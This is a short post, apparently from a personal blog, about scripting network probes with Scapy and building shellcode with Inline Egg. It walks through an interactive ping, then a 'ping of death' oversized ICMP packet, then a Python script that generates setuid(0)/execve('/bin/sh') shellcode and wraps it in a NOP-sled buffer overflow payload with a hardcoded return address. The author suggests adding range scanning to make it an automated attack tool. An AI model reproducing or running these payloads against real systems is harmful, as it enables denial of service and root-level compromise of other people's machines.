Between Scapy and Inline Egg,
scripting network probes and [remote] buffer overflows has gotten much simpler. Scapy allows you to interactively craft packets and send/receive
them, once you've debugged the packet construction, you can drop it to a python script for re-use. Inline Egg takes care of crafting null-less
opcode segments for hijacking running processes.
Scapy comes with a slew of protocols, and handy tools like traceroute, arpcachepoison, p0f, etc. Here's an example of
interactively crafting some pings:
# normal ping
>>> ip = IP(dst="192.168.1.1")
>>> pkt = ip/ICMP()/"0xDECAFBAD"
>>> ans,unans = sr( pkt )
Begin emission:
.Finished to send 1 packets.
*
Received 2 packets, got 1 answers, remaining 0 packets
>>> ans.hexraw()
0000 08:11:27.604624 IP / ICMP 192.168.1.50 > 192.168.1.1 echo-request 0 / Raw ==> IP / ICMP 192.168.1.1 > 192.168.1.50 echo-reply 0 / Raw / Padding
0000 30 78 44 45 43 41 46 42 41 44 0xDECAFBAD
# ping of death
>>> pkt = ip / ICMP() / "0xDECAFBAD"*6551
>>> ans,drops = sr( pkt )
..Begin emission:
............................
Inline Egg has a lot of power, check out this basic shellcode creation below.
One just needs to parametrize this, add some range scanning, and you have a very usable automated tool.
import inlineegg.inlineegg as ie
import struct
import sys
def stdinShellEgg():
egg = ie.InlineEgg(ie.Linuxx86Syscall) # FreeBSDx86Syscall OpenBSDx86Syscall
egg.setuid(0)
egg.setgid(0)
egg.execve('/bin/sh',('sh'))
return egg
def main():
# create egg
egg = stdinShellEgg()
# exploit
retAddr = struct.pack('<L',0xbffffc24L)
toSend = "\x90"*(1024-len(egg))
toSend += egg.getCode()
toSend += retAddr*20
print toSend
main()